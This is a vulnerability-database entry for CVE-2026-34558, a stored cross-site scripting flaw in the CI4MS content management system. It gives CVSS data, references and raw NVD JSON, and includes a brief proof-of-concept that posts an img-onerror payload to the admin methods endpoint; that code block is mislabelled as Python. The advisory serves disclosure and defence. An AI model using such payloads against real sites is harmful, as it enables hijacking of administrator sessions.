CVE-2026-34558

Description

CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:* - VULNERABLE

CI4MS < 0.31.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- PoC Concept for Stored DOM-based XSS in CI4MS -->
<!-- Step 1: Attacker injects payload via Methods Management -->
<script>
  // Simulating a POST request to the vulnerable endpoint
  // This requires a low-privileged user session
  fetch('/admin/methods/create', {
    method: 'POST',
    headers: {
      'Content-Type': 'application/x-www-form-urlencoded',
    },
    body: 'method_name=<img src=x onerror=alert(document.cookie)>&description=Payload'
  }).then(response => console.log('Payload injected'));
</script>

<!-- Step 2: When an admin visits the dashboard, the stored payload executes -->
<!-- Result: Admin's cookie or session token is stolen -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34558
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34558
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34558/
[4] VulDB https://vuldb.com/cve/CVE-2026-34558
[5] https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34558", "sourceIdentifier": "[email protected]", "published": "2026-03-30T21:17:10.493", "lastModified": "2026-04-06T16:10:04.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0."}, {"lang": "es", "value": "CI4MS es un esqueleto de CMS basado en CodeIgniter 4 que ofrece una arquitectura modular lista para producción con autorización RBAC y soporte de temas. Antes de la versión 0.31.0.0, la aplicación no logra sanear correctamente la entrada controlada por el usuario dentro de la funcionalidad de Gestión de Métodos al crear o gestionar métodos/páginas de la aplicación. Múltiples campos de entrada aceptan cargas útiles de JavaScript controladas por el atacante que se almacenan en el servidor sin saneamiento ni codificación de salida. Estos valores almacenados se renderizan posteriormente directamente en interfaces administrativas y componentes de navegación global sin la codificación adecuada, lo que resulta en Cross-Site Scripting (XSS) persistente basado en DOM. Este problema ha sido parcheado en la versión 0.31.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 5.3}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ci4-cms-erp:ci4ms:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.31.0.0", "matchCriteriaId": "805F6B8A-9324-4CA4-BADE-439CC15DA14C"}]}]}], "references": [{"url": "https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-v77r-xg3p-75g7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory", "Mitigation"]}]}}